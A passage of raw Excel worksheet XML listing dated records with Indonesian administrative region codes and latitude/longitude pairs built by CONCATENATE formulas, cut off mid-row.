      <c r="I2099" t="s">
        <v>277</v>
      </c>
      <c r="J2099" t="s">
        <v>2263</v>
      </c>
      <c r="L2099" t="s">
        <v>7003</v>
      </c>
      <c r="M2099">
        <v>3171080001</v>
      </c>
      <c r="N2099">
        <v>3171080</v>
      </c>
      <c r="O2099">
        <v>3171</v>
      </c>
      <c r="P2099">
        <v>31</v>
      </c>
      <c r="Q2099" t="s">
        <v>2265</v>
      </c>
      <c r="R2099" t="s">
        <v>1403</v>
      </c>
      <c r="S2099" t="s">
        <v>108</v>
      </c>
      <c r="T2099" t="s">
        <v>33</v>
      </c>
      <c r="U2099" s="5">
        <v>10683264</v>
      </c>
      <c r="V2099" s="5" t="s">
        <v>16317</v>
      </c>
      <c r="W2099" s="5">
        <v>-626669</v>
      </c>
      <c r="X2099" t="s">
        <v>20077</v>
      </c>
      <c r="Y2099" t="str">
        <f t="shared" si="32"/>
        <v>-6.26669,106.83264</v>
      </c>
    </row>
    <row r="2100" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2100">
        <v>187491</v>
      </c>
      <c r="B2100" s="1">
        <v>43950</v>
      </c>
      <c r="C2100">
        <v>0</v>
      </c>
      <c r="D2100" t="s">
        <v>22</v>
      </c>
      <c r="E2100" t="s">
        <v>23</v>
      </c>
      <c r="F2100" t="s">
        <v>7004</v>
      </c>
      <c r="G2100" t="s">
        <v>7005</v>
      </c>
      <c r="H2100" t="s">
        <v>26</v>
      </c>
      <c r="I2100" t="s">
        <v>1005</v>
      </c>
      <c r="J2100" t="s">
        <v>3675</v>
      </c>
      <c r="L2100" t="s">
        <v>7006</v>
      </c>
      <c r="M2100">
        <v>3171070001</v>
      </c>
      <c r="N2100">
        <v>3171070</v>
      </c>
      <c r="O2100">
        <v>3171</v>
      </c>
      <c r="P2100">
        <v>31</v>
      </c>
      <c r="Q2100" t="s">
        <v>120</v>
      </c>
      <c r="R2100" t="s">
        <v>121</v>
      </c>
      <c r="S2100" t="s">
        <v>108</v>
      </c>
      <c r="T2100" t="s">
        <v>33</v>
      </c>
      <c r="U2100" s="5">
        <v>10682524</v>
      </c>
      <c r="V2100" s="5" t="s">
        <v>16318</v>
      </c>
      <c r="W2100" s="5">
        <v>-625894</v>
      </c>
      <c r="X2100" t="s">
        <v>20078</v>
      </c>
      <c r="Y2100" t="str">
        <f t="shared" si="32"/>
        <v>-6.25894,106.82524</v>
      </c>
    </row>
    <row r="2101" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2101">
        <v>187560</v>
      </c>
      <c r="B2101" s="1">
        <v>43950</v>
      </c>
      <c r="C2101">
        <v>1</v>
      </c>
      <c r="D2101" t="s">
        <v>2648</v>
      </c>
      <c r="E2101" t="s">
        <v>23</v>
      </c>
      <c r="G2101" t="s">
        <v>7007</v>
      </c>
      <c r="H2101" t="s">
        <v>26</v>
      </c>
      <c r="J2101" t="s">
        <v>530</v>
      </c>
      <c r="L2101" t="s">
        <v>7008</v>
      </c>
      <c r="M2101">
        <v>3174020006</v>
      </c>
      <c r="N2101">
        <v>3174020</v>
      </c>
      <c r="O2101">
        <v>3174</v>
      </c>
      <c r="P2101">
        <v>31</v>
      </c>
      <c r="Q2101" t="s">
        <v>427</v>
      </c>
      <c r="R2101" t="s">
        <v>31</v>
      </c>
      <c r="S2101" t="s">
        <v>32</v>
      </c>
      <c r="T2101" t="s">
        <v>33</v>
      </c>
      <c r="U2101" s="5">
        <v>10675768</v>
      </c>
      <c r="V2101" s="5" t="s">
        <v>16319</v>
      </c>
      <c r="W2101" s="5">
        <v>-618685</v>
      </c>
      <c r="X2101" t="s">
        <v>20079</v>
      </c>
      <c r="Y2101" t="str">
        <f t="shared" si="32"/>
        <v>-6.18685,106.75768</v>
      </c>
    </row>
    <row r="2102" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2102">
        <v>187616</v>
      </c>
      <c r="B2102" s="1">
        <v>43950</v>
      </c>
      <c r="C2102">
        <v>1</v>
      </c>
      <c r="D2102" t="s">
        <v>85</v>
      </c>
      <c r="E2102" t="s">
        <v>23</v>
      </c>
      <c r="F2102" t="s">
        <v>7009</v>
      </c>
      <c r="G2102" t="s">
        <v>7010</v>
      </c>
      <c r="H2102" t="s">
        <v>26</v>
      </c>
      <c r="J2102" t="s">
        <v>6980</v>
      </c>
      <c r="K2102" t="s">
        <v>7011</v>
      </c>
      <c r="L2102" t="s">
        <v>7012</v>
      </c>
      <c r="M2102">
        <v>3171040002</v>
      </c>
      <c r="N2102">
        <v>3171040</v>
      </c>
      <c r="O2102">
        <v>3171</v>
      </c>
      <c r="P2102">
        <v>31</v>
      </c>
      <c r="Q2102" t="s">
        <v>163</v>
      </c>
      <c r="R2102" t="s">
        <v>163</v>
      </c>
      <c r="S2102" t="s">
        <v>108</v>
      </c>
      <c r="T2102" t="s">
        <v>33</v>
      </c>
      <c r="U2102" s="5">
        <v>10676370</v>
      </c>
      <c r="V2102" s="5" t="s">
        <v>16320</v>
      </c>
      <c r="W2102" s="5">
        <v>-625550</v>
      </c>
      <c r="X2102" t="s">
        <v>20080</v>
      </c>
      <c r="Y2102" t="str">
        <f t="shared" si="32"/>
        <v>-6.25550,106.76370</v>
      </c>
    </row>
    <row r="2103" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2103">
        <v>187617</v>
      </c>
      <c r="B2103" s="1">
        <v>43950</v>
      </c>
      <c r="C2103">
        <v>0</v>
      </c>
      <c r="D2103" t="s">
        <v>85</v>
      </c>
      <c r="E2103" t="s">
        <v>23</v>
      </c>
      <c r="F2103" t="s">
        <v>7013</v>
      </c>
      <c r="G2103" t="s">
        <v>7014</v>
      </c>
      <c r="H2103" t="s">
        <v>26</v>
      </c>
      <c r="J2103" t="s">
        <v>6980</v>
      </c>
      <c r="K2103" t="s">
        <v>7015</v>
      </c>
      <c r="L2103" t="s">
        <v>7016</v>
      </c>
      <c r="M2103">
        <v>3171040002</v>
      </c>
      <c r="N2103">
        <v>3171040</v>
      </c>
      <c r="O2103">
        <v>3171</v>
      </c>
      <c r="P2103">
        <v>31</v>
      </c>
      <c r="Q2103" t="s">
        <v>163</v>
      </c>
      <c r="R2103" t="s">
        <v>163</v>
      </c>
      <c r="S2103" t="s">
        <v>108</v>
      </c>
      <c r="T2103" t="s">
        <v>33</v>
      </c>
      <c r="U2103" s="5">
        <v>10676370</v>
      </c>
      <c r="V2103" s="5" t="s">
        <v>16320</v>
      </c>
      <c r="W2103" s="5">
        <v>-625550</v>
      </c>
      <c r="X2103" t="s">
        <v>20080</v>
      </c>
      <c r="Y2103" t="str">
        <f t="shared" si="32"/>
        <v>-6.25550,106.76370</v>
      </c>
    </row>
    <row r="2104" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2104">
        <v>187633</v>
      </c>
      <c r="B2104" s="1">
        <v>43950</v>
      </c>
      <c r="C2104">
        <v>1</v>
      </c>
      <c r="D2104" t="s">
        <v>22</v>
      </c>
      <c r="E2104" t="s">
        <v>23</v>
      </c>
      <c r="F2104" t="s">
        <v>7017</v>
      </c>
      <c r="H2104" t="s">
        <v>26</v>
      </c>
      <c r="I2104" t="s">
        <v>1624</v>
      </c>
      <c r="J2104" t="s">
        <v>3135</v>
      </c>
      <c r="L2104" t="s">
        <v>7018</v>
      </c>
      <c r="M2104">
        <v>3604261002</v>
      </c>
      <c r="N2104">
        <v>3604261</v>
      </c>
      <c r="O2104">
        <v>3604</v>
      </c>
      <c r="P2104">
        <v>36</v>
      </c>
      <c r="Q2104" t="s">
        <v>7019</v>
      </c>
      <c r="R2104" t="s">
        <v>7020</v>
      </c>
      <c r="S2104" t="s">
        <v>7021</v>
      </c>
      <c r="T2104" t="s">
        <v>171</v>
      </c>
      <c r="U2104" s="5">
        <v>10638785</v>
      </c>
      <c r="V2104" s="5" t="s">
        <v>16321</v>
      </c>
      <c r="W2104" s="5">
        <v>-614575</v>
      </c>
      <c r="X2104" t="s">
        <v>19271</v>
      </c>
      <c r="Y2104" t="str">
        <f t="shared" si="32"/>
        <v>-6.14575,106.38785</v>
      </c>
    </row>
    <row r="2105" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2105">
        <v>189902</v>
      </c>
      <c r="B2105" s="1">
        <v>43952</v>
      </c>
      <c r="C2105" s="2">
        <v>0.10416666666666667</v>
      </c>
      <c r="D2105" t="s">
        <v>2648</v>
      </c>
      <c r="E2105" t="s">
        <v>23</v>
      </c>
      <c r="G2105" t="s">
        <v>7022</v>
      </c>
      <c r="H2105" t="s">
        <v>26</v>
      </c>
      <c r="J2105" t="s">
        <v>7023</v>
      </c>
      <c r="L2105" t="s">
        <v>7024</v>
      </c>
      <c r="M2105">
        <v>3171020004</v>
      </c>
      <c r="N2105">
        <v>3171020</v>
      </c>
      <c r="O2105">
        <v>3171</v>
      </c>
      <c r="P2105">
        <v>31</v>
      </c>
      <c r="Q2105" t="s">
        <v>484</v>
      </c>
      <c r="R2105" t="s">
        <v>484</v>
      </c>
      <c r="S2105" t="s">
        <v>108</v>
      </c>
      <c r="T2105" t="s">
        <v>33</v>
      </c>
      <c r="U2105" s="5">
        <v>10683898</v>
      </c>
      <c r="V2105" s="5" t="s">
        <v>16322</v>
      </c>
      <c r="W2105" s="5">
        <v>-628230</v>
      </c>
      <c r="X2105" t="s">
        <v>20081</v>
      </c>
      <c r="Y2105" t="str">
        <f t="shared" si="32"/>
        <v>-6.28230,106.83898</v>
      </c>
    </row>
    <row r="2106" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2106">
        <v>189966</v>
      </c>
      <c r="B2106" s="1">
        <v>43952</v>
      </c>
      <c r="C2106" s="2">
        <v>0.19841435185185186</v>
      </c>
      <c r="D2106" t="s">
        <v>22</v>
      </c>
      <c r="E2106" t="s">
        <v>23</v>
      </c>
      <c r="F2106" t="s">
        <v>7025</v>
      </c>
      <c r="G2106" t="s">
        <v>7026</v>
      </c>
      <c r="H2106" t="s">
        <v>26</v>
      </c>
      <c r="I2106" t="s">
        <v>1194</v>
      </c>
      <c r="J2106" t="s">
        <v>7027</v>
      </c>
      <c r="L2106" t="s">
        <v>7028</v>
      </c>
      <c r="M2106">
        <v>3171020006</v>
      </c>
      <c r="N2106">
        <v>3171020</v>
      </c>
      <c r="O2106">
        <v>3171</v>
      </c>
      <c r="P2106">
        <v>31</v>
      </c>
      <c r="Q2106" t="s">
        <v>499</v>
      </c>
      <c r="R2106" t="s">
        <v>484</v>
      </c>
      <c r="S2106" t="s">
        <v>108</v>
      </c>
      <c r="T2106" t="s">
        <v>33</v>
      </c>
      <c r="U2106" s="5">
        <v>10683923</v>
      </c>
      <c r="V2106" s="5" t="s">
        <v>16323</v>
      </c>
      <c r="W2106" s="5">
        <v>-626935</v>
      </c>
      <c r="X2106" t="s">
        <v>19096</v>
      </c>
      <c r="Y2106" t="str">
        <f t="shared" si="32"/>
        <v>-6.26935,106.83923</v>
      </c>
    </row>
    <row r="2107" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2107">
        <v>190451</v>
      </c>
      <c r="B2107" s="1">
        <v>43953</v>
      </c>
      <c r="C2107" s="2">
        <v>6.4375000000000002E-2</v>
      </c>
      <c r="D2107" t="s">
        <v>22</v>
      </c>
      <c r="E2107" t="s">
        <v>23</v>
      </c>
      <c r="F2107" t="s">
        <v>7029</v>
      </c>
      <c r="G2107" t="s">
        <v>7030</v>
      </c>
      <c r="H2107" t="s">
        <v>26</v>
      </c>
      <c r="I2107" t="s">
        <v>1710</v>
      </c>
      <c r="J2107" t="s">
        <v>2627</v>
      </c>
      <c r="L2107" t="s">
        <v>7031</v>
      </c>
      <c r="M2107">
        <v>3204170003</v>
      </c>
      <c r="N2107">
        <v>3204170</v>
      </c>
      <c r="O2107">
        <v>3204</v>
      </c>
      <c r="P2107">
        <v>32</v>
      </c>
      <c r="Q2107" t="s">
        <v>7032</v>
      </c>
      <c r="R2107" t="s">
        <v>6865</v>
      </c>
      <c r="S2107" t="s">
        <v>1464</v>
      </c>
      <c r="T2107" t="s">
        <v>42</v>
      </c>
      <c r="U2107" s="5">
        <v>10758708</v>
      </c>
      <c r="V2107" s="5" t="s">
        <v>16324</v>
      </c>
      <c r="W2107" s="5">
        <v>-702928</v>
      </c>
      <c r="X2107" t="s">
        <v>20082</v>
      </c>
      <c r="Y2107" t="str">
        <f t="shared" si="32"/>
        <v>-7.02928,107.58708</v>
      </c>
    </row>
    <row r="2108" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2108">
        <v>190452</v>
      </c>
      <c r="B2108" s="1">
        <v>43955</v>
      </c>
      <c r="C2108" s="2">
        <v>0.16089120370370372</v>
      </c>
      <c r="D2108" t="s">
        <v>85</v>
      </c>
      <c r="E2108" t="s">
        <v>23</v>
      </c>
      <c r="F2108" t="s">
        <v>7033</v>
      </c>
      <c r="G2108" t="s">
        <v>7034</v>
      </c>
      <c r="H2108" t="s">
        <v>26</v>
      </c>
      <c r="J2108" t="s">
        <v>2627</v>
      </c>
      <c r="K2108" t="s">
        <v>7035</v>
      </c>
      <c r="L2108" t="s">
        <v>7036</v>
      </c>
      <c r="M2108">
        <v>3273020006</v>
      </c>
      <c r="N2108">
        <v>3273020</v>
      </c>
      <c r="O2108">
        <v>3273</v>
      </c>
      <c r="P2108">
        <v>32</v>
      </c>
      <c r="Q2108" t="s">
        <v>7037</v>
      </c>
      <c r="R2108" t="s">
        <v>6738</v>
      </c>
      <c r="S2108" t="s">
        <v>1464</v>
      </c>
      <c r="T2108" t="s">
        <v>42</v>
      </c>
      <c r="U2108" s="5">
        <v>10758338</v>
      </c>
      <c r="V2108" s="5" t="s">
        <v>16325</v>
      </c>
      <c r="W2108" s="5">
        <v>-693288</v>
      </c>
      <c r="X2108" t="s">
        <v>20083</v>
      </c>
      <c r="Y2108" t="str">
        <f t="shared" si="32"/>
        <v>-6.93288,107.58338</v>
      </c>
    </row>
    <row r="2109" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2109">
        <v>190453</v>
      </c>
      <c r="B2109" s="1">
        <v>43955</v>
      </c>
      <c r="C2109" s="2">
        <v>0.23130787037037037</v>
      </c>
      <c r="D2109" t="s">
        <v>22</v>
      </c>
      <c r="E2109" t="s">
        <v>23</v>
      </c>
      <c r="F2109" t="s">
        <v>7038</v>
      </c>
      <c r="G2109" t="s">
        <v>7039</v>
      </c>
      <c r="H2109" t="s">
        <v>26</v>
      </c>
      <c r="I2109" t="s">
        <v>893</v>
      </c>
      <c r="J2109" t="s">
        <v>3135</v>
      </c>
      <c r="L2109" t="s">
        <v>7040</v>
      </c>
      <c r="M2109">
        <v>3672021006</v>
      </c>
      <c r="N2109">
        <v>3672021</v>
      </c>
      <c r="O2109">
        <v>3672</v>
      </c>
      <c r="P2109">
        <v>36</v>
      </c>
      <c r="Q2109" t="s">
        <v>7041</v>
      </c>
      <c r="R2109" t="s">
        <v>7042</v>
      </c>
      <c r="S2109" t="s">
        <v>7043</v>
      </c>
      <c r="T2109" t="s">
        <v>171</v>
      </c>
      <c r="U2109" s="5">
        <v>10604073</v>
      </c>
      <c r="V2109" s="5" t="s">
        <v>16326</v>
      </c>
      <c r="W2109" s="5">
        <v>-598658</v>
      </c>
      <c r="X2109" t="s">
        <v>20084</v>
      </c>
      <c r="Y2109" t="str">
        <f t="shared" si="32"/>
        <v>-5.98658,106.04073</v>
      </c>
    </row>
    <row r="2110" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2110">
        <v>190454</v>
      </c>
      <c r="B2110" s="1">
        <v>43955</v>
      </c>
      <c r="C2110" s="2">
        <v>0.54962962962962958</v>
      </c>
      <c r="D2110" t="s">
        <v>22</v>
      </c>
      <c r="E2110" t="s">
        <v>23</v>
      </c>
      <c r="F2110" t="s">
        <v>7044</v>
      </c>
      <c r="G2110" t="s">
        <v>7045</v>
      </c>
      <c r="H2110" t="s">
        <v>26</v>
      </c>
      <c r="I2110" t="s">
        <v>1364</v>
      </c>
      <c r="J2110" t="s">
        <v>3135</v>
      </c>
      <c r="M2110">
        <v>3672031002</v>
      </c>
      <c r="N2110">
        <v>3672031</v>
      </c>
      <c r="O2110">
        <v>3672</v>
      </c>
      <c r="P2110">
        <v>36</v>
      </c>
      <c r="Q2110" t="s">
        <v>7046</v>
      </c>
      <c r="R2110" t="s">
        <v>340</v>
      </c>
      <c r="S2110" t="s">
        <v>7043</v>
      </c>
      <c r="T2110" t="s">
        <v>171</v>
      </c>
      <c r="U2110" s="5">
        <v>10605927</v>
      </c>
      <c r="V2110" s="5" t="s">
        <v>16327</v>
      </c>
      <c r="W2110" s="5">
        <v>-601074</v>
      </c>
      <c r="X2110" t="s">
        <v>20085</v>
      </c>
      <c r="Y2110" t="str">
        <f t="shared" si="32"/>
        <v>-6.01074,106.05927</v>
      </c>
    </row>
    <row r="2111" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2111">
        <v>190455</v>
      </c>
      <c r="B2111" s="1">
        <v>43955</v>
      </c>
      <c r="C2111" s="2">
        <v>0.58480324074074075</v>
      </c>
      <c r="D2111" t="s">
        <v>22</v>
      </c>
      <c r="E2111" t="s">
        <v>23</v>
      </c>
      <c r="F2111" t="s">
        <v>7047</v>
      </c>
      <c r="G2111" t="s">
        <v>7048</v>
      </c>
      <c r="H2111" t="s">
        <v>26</v>
      </c>
      <c r="I2111" t="s">
        <v>908</v>
      </c>
      <c r="J2111" t="s">
        <v>2608</v>
      </c>
      <c r="L2111" t="s">
        <v>7049</v>
      </c>
      <c r="M2111">
        <v>3320080005</v>
      </c>
      <c r="N2111">
        <v>3320080</v>
      </c>
      <c r="O2111">
        <v>3320</v>
      </c>
      <c r="P2111">
        <v>33</v>
      </c>
      <c r="Q2111" t="s">
        <v>6472</v>
      </c>
      <c r="R2111" t="s">
        <v>2976</v>
      </c>
      <c r="S2111" t="s">
        <v>2976</v>
      </c>
      <c r="T2111" t="s">
        <v>1134</v>
      </c>
      <c r="U2111" s="5">
        <v>11067184</v>
      </c>
      <c r="V2111" s="5" t="s">
        <v>16328</v>
      </c>
      <c r="W2111" s="5">
        <v>-659495</v>
      </c>
      <c r="X2111" t="s">
        <v>20086</v>
      </c>
      <c r="Y2111" t="str">
        <f t="shared" si="32"/>
        <v>-6.59495,110.67184</v>
      </c>
    </row>
    <row r="2112" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2112">
        <v>190456</v>
      </c>
      <c r="B2112" s="1">
        <v>43955</v>
      </c>
      <c r="C2112" s="2">
        <v>0.58893518518518517</v>
      </c>
      <c r="D2112" t="s">
        <v>22</v>
      </c>
      <c r="E2112" t="s">
        <v>23</v>
      </c>
      <c r="F2112" t="s">
        <v>7050</v>
      </c>
      <c r="G2112" t="s">
        <v>7051</v>
      </c>
      <c r="H2112" t="s">
        <v>26</v>
      </c>
      <c r="I2112" t="s">
        <v>523</v>
      </c>
      <c r="J2112" t="s">
        <v>2608</v>
      </c>
      <c r="L2112" t="s">
        <v>1456</v>
      </c>
      <c r="M2112">
        <v>3320080005</v>
      </c>
      <c r="N2112">
        <v>3320080</v>
      </c>
      <c r="O2112">
        <v>3320</v>
      </c>
      <c r="P2112">
        <v>33</v>
      </c>
      <c r="Q2112" t="s">
        <v>6472</v>
      </c>
      <c r="R2112" t="s">
        <v>2976</v>
      </c>
      <c r="S2112" t="s">
        <v>2976</v>
      </c>
      <c r="T2112" t="s">
        <v>1134</v>
      </c>
      <c r="U2112" s="5">
        <v>11067184</v>
      </c>
      <c r="V2112" s="5" t="s">
        <v>16328</v>
      </c>
      <c r="W2112" s="5">
        <v>-659496</v>
      </c>
      <c r="X2112" t="s">
        <v>20087</v>
      </c>
      <c r="Y2112" t="str">
        <f t="shared" si="32"/>
        <v>-6.59496,110.67184</v>
      </c>
    </row>
    <row r="2113" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2113">
        <v>190629</v>
      </c>
      <c r="B2113" s="1">
        <v>43958</v>
      </c>
      <c r="C2113" s="2">
        <v>0.9822685185185186</v>
      </c>
      <c r="D2113" t="s">
        <v>22</v>
      </c>
      <c r="E2113" t="s">
        <v>23</v>
      </c>
      <c r="F2113" t="s">
        <v>7052</v>
      </c>
      <c r="G2113" t="s">
        <v>7053</v>
      </c>
      <c r="H2113" t="s">
        <v>26</v>
      </c>
      <c r="I2113" t="s">
        <v>2196</v>
      </c>
      <c r="J2113" t="s">
        <v>6940</v>
      </c>
      <c r="L2113" t="s">
        <v>7054</v>
      </c>
      <c r="M2113">
        <v>1171020019</v>
      </c>
      <c r="N2113">
        <v>1171020</v>
      </c>
      <c r="O2113">
        <v>1171</v>
      </c>
      <c r="P2113">
        <v>11</v>
      </c>
      <c r="Q2113" t="s">
        <v>7055</v>
      </c>
      <c r="R2113" t="s">
        <v>7056</v>
      </c>
      <c r="S2113" t="s">
        <v>7057</v>
      </c>
      <c r="T2113" t="s">
        <v>6945</v>
      </c>
      <c r="U2113" s="5">
        <v>9531635</v>
      </c>
      <c r="V2113" s="5" t="s">
        <v>16329</v>
      </c>
      <c r="W2113" s="5">
        <v>555935</v>
      </c>
      <c r="X2113" t="s">
        <v>20088</v>
      </c>
      <c r="Y2113" t="str">
        <f t="shared" si="32"/>
        <v>5.55935,95.31635</v>
      </c>
    </row>
    <row r="2114" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2114">
        <v>190630</v>
      </c>
      <c r="B2114" s="1">
        <v>43959</v>
      </c>
      <c r="C2114" s="2">
        <v>0.37421296296296297</v>
      </c>
      <c r="D2114" t="s">
        <v>22</v>
      </c>
      <c r="E2114" t="s">
        <v>23</v>
      </c>
      <c r="F2114" t="s">
        <v>7058</v>
      </c>
      <c r="G2114" t="s">
        <v>7059</v>
      </c>
      <c r="H2114" t="s">
        <v>26</v>
      </c>
      <c r="I2114" t="s">
        <v>1891</v>
      </c>
      <c r="J2114" t="s">
        <v>6940</v>
      </c>
      <c r="L2114" t="s">
        <v>7060</v>
      </c>
      <c r="M2114">
        <v>1171020008</v>
      </c>
      <c r="N2114">
        <v>1171020</v>
      </c>
      <c r="O2114">
        <v>1171</v>
      </c>
      <c r="P2114">
        <v>11</v>
      </c>
      <c r="Q2114" t="s">
        <v>7061</v>
      </c>
      <c r="R2114" t="s">
        <v>7056</v>
      </c>
      <c r="S2114" t="s">
        <v>7057</v>
      </c>
      <c r="T2114" t="s">
        <v>6945</v>
      </c>
      <c r="U2114" s="5">
        <v>9532523</v>
      </c>
      <c r="V2114" s="5" t="s">
        <v>16330</v>
      </c>
      <c r="W2114" s="5">
        <v>555011</v>
      </c>
      <c r="X2114" t="s">
        <v>20089</v>
      </c>
      <c r="Y2114" t="str">
        <f t="shared" si="32"/>
        <v>5.55011,95.32523</v>
      </c>
    </row>
    <row r="2115" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2115">
        <v>190631</v>
      </c>
      <c r="B2115" s="1">
        <v>43959</v>
      </c>
      <c r="C2115" s="2">
        <v>0.55440972222222229</v>
      </c>
      <c r="D2115" t="s">
        <v>22</v>
      </c>
      <c r="E2115" t="s">
        <v>23</v>
      </c>
      <c r="F2115" t="s">
        <v>7062</v>
      </c>
      <c r="G2115" t="s">
        <v>7063</v>
      </c>
      <c r="H2115" t="s">
        <v>26</v>
      </c>
      <c r="I2115" t="s">
        <v>181</v>
      </c>
      <c r="J2115" t="s">
        <v>6940</v>
      </c>
      <c r="L2115" t="s">
        <v>7064</v>
      </c>
      <c r="M2115">
        <v>1171020019</v>
      </c>
      <c r="N2115">
        <v>1171020</v>
      </c>
      <c r="O2115">
        <v>1171</v>
      </c>
      <c r="P2115">
        <v>11</v>
      </c>
      <c r="Q2115" t="s">
        <v>7055</v>
      </c>
      <c r="R2115" t="s">
        <v>7056</v>
      </c>
      <c r="S2115" t="s">
        <v>7057</v>
      </c>
      <c r="T2115" t="s">
        <v>6945</v>
      </c>
      <c r="U2115" s="5">
        <v>9531473</v>
      </c>
      <c r="V2115" s="5" t="s">
        <v>16331</v>
      </c>
      <c r="W2115" s="5">
        <v>555484</v>
      </c>
      <c r="X2115" t="s">
        <v>20090</v>
      </c>
      <c r="Y2115" t="str">
        <f t="shared" ref="Y2115:Y2178" si="33">CONCATENATE(X2115,",",V2115)</f>
        <v>5.55484,95.31473</v>
      </c>
    </row>
    <row r="2116" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2116">
        <v>190632</v>
      </c>
      <c r="B2116" s="1">
        <v>43959</v>
      </c>
      <c r="C2116" s="2">
        <v>0.79972222222222211</v>
      </c>
      <c r="D2116" t="s">
        <v>22</v>
      </c>
      <c r="E2116" t="s">
        <v>23</v>
      </c>
      <c r="F2116" t="s">
        <v>7065</v>
      </c>
      <c r="H2116" t="s">
        <v>26</v>
      </c>
      <c r="I2116" t="s">
        <v>1394</v>
      </c>
      <c r="J2116" t="s">
        <v>6940</v>
      </c>
      <c r="L2116" t="s">
        <v>7066</v>
      </c>
      <c r="M2116">
        <v>1110050001</v>
      </c>
      <c r="N2116">
        <v>1110050</v>
      </c>
      <c r="O2116">
        <v>1110</v>
      </c>
      <c r="P2116">
        <v>11</v>
      </c>
      <c r="Q2116" t="s">
        <v>7067</v>
      </c>
      <c r="R2116" t="s">
        <v>7068</v>
      </c>
      <c r="S2116" t="s">
        <v>6944</v>
      </c>
      <c r="T2116" t="s">
        <v>6945</v>
      </c>
      <c r="U2116" s="5">
        <v>9671166</v>
      </c>
      <c r="V2116" s="5" t="s">
        <v>16332</v>
      </c>
      <c r="W2116" s="5">
        <v>507030</v>
      </c>
      <c r="X2116" t="s">
        <v>20091</v>
      </c>
      <c r="Y2116" t="str">
        <f t="shared" si="33"/>
        <v>5.07030,96.71166</v>
      </c>
    </row>
    <row r="2117" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2117">
        <v>190633</v>
      </c>
      <c r="B2117" s="1">
        <v>43961</v>
      </c>
      <c r="C2117" s="2">
        <v>3.9155092592592596E-2</v>
      </c>
      <c r="D2117" t="s">
        <v>22</v>
      </c>
      <c r="E2117" t="s">
        <v>23</v>
      </c>
      <c r="F2117" t="s">
        <v>7069</v>
      </c>
      <c r="G2117" t="s">
        <v>7070</v>
      </c>
      <c r="H2117" t="s">
        <v>26</v>
      </c>
      <c r="I2117" t="s">
        <v>2293</v>
      </c>
      <c r="J2117" t="s">
        <v>2608</v>
      </c>
      <c r="L2117" t="s">
        <v>7071</v>
      </c>
      <c r="M2117">
        <v>3324110003</v>
      </c>
      <c r="N2117">
        <v>3324110</v>
      </c>
      <c r="O2117">
        <v>3324</v>
      </c>
      <c r="P2117">
        <v>33</v>
      </c>
      <c r="Q2117" t="s">
        <v>7072</v>
      </c>
      <c r="R2117" t="s">
        <v>7073</v>
      </c>
      <c r="S2117" t="s">
        <v>7074</v>
      </c>
      <c r="T2117" t="s">
        <v>1134</v>
      </c>
      <c r="U2117" s="5">
        <v>11011007</v>
      </c>
      <c r="V2117" s="5" t="s">
        <v>16333</v>
      </c>
      <c r="W2117" s="5">
        <v>-704359</v>
      </c>
      <c r="X2117" t="s">
        <v>20092</v>
      </c>
      <c r="Y2117" t="str">
        <f t="shared" si="33"/>
        <v>-7.04359,110.11007</v>
      </c>
    </row>
    <row r="2118" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2118">
        <v>190634</v>
      </c>
      <c r="B2118" s="1">
        <v>43961</v>
      </c>
      <c r="C2118" s="2">
        <v>0.36065972222222226</v>
      </c>
      <c r="D2118" t="s">
        <v>22</v>
      </c>
      <c r="E2118" t="s">
        <v>23</v>
      </c>
      <c r="F2118" t="s">
        <v>7075</v>
      </c>
      <c r="H2118" t="s">
        <v>26</v>
      </c>
      <c r="I2118" t="s">
        <v>2073</v>
      </c>
      <c r="J2118" t="s">
        <v>2622</v>
      </c>
      <c r="L2118" t="s">
        <v>7076</v>
      </c>
      <c r="M2118">
        <v>3523090010</v>
      </c>
      <c r="N2118">
        <v>3523090</v>
      </c>
      <c r="O2118">
        <v>3523</v>
      </c>
      <c r="P2118">
        <v>35</v>
      </c>
      <c r="Q2118" t="s">
        <v>7077</v>
      </c>
      <c r="R2118" t="s">
        <v>7078</v>
      </c>
      <c r="S2118" t="s">
        <v>7079</v>
      </c>
      <c r="T2118" t="s">
        <v>1221</v>
      </c>
      <c r="U2118" s="5">
        <v>11211962</v>
      </c>
      <c r="V2118" s="5" t="s">
        <v>16334</v>
      </c>
      <c r="W2118" s="5">
        <v>-709600</v>
      </c>
      <c r="X2118" t="s">
        <v>20093</v>
      </c>
      <c r="Y2118" t="str">
        <f t="shared" si="33"/>
        <v>-7.09600,112.11962</v>
      </c>
    </row>
    <row r="2119" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2119">
        <v>190635</v>
      </c>
      <c r="B2119" s="1">
        <v>43961</v>
      </c>
      <c r="C2119" s="2">
        <v>0.39415509259259257</v>
      </c>
      <c r="D2119" t="s">
        <v>22</v>
      </c>
      <c r="E2119" t="s">
        <v>23</v>
      </c>
      <c r="F2119" t="s">
        <v>7080</v>
      </c>
      <c r="G2119" t="s">
        <v>7081</v>
      </c>
      <c r="H2119" t="s">
        <v>26</v>
      </c>
      <c r="I2119" t="s">
        <v>5188</v>
      </c>
      <c r="J2119" t="s">
        <v>2263</v>
      </c>
      <c r="L2119" t="s">
        <v>7082</v>
      </c>
      <c r="M2119">
        <v>3171080001</v>
      </c>
      <c r="N2119">
        <v>3171080</v>
      </c>
      <c r="O2119">
        <v>3171</v>
      </c>
      <c r="P2119">
        <v>31</v>
      </c>
      <c r="Q2119" t="s">
        <v>2265</v>
      </c>
      <c r="R2119" t="s">
        <v>1403</v>
      </c>
      <c r="S2119" t="s">
        <v>108</v>
      </c>
      <c r="T2119" t="s">
        <v>33</v>
      </c>
      <c r="U2119" s="5">
        <v>10683227</v>
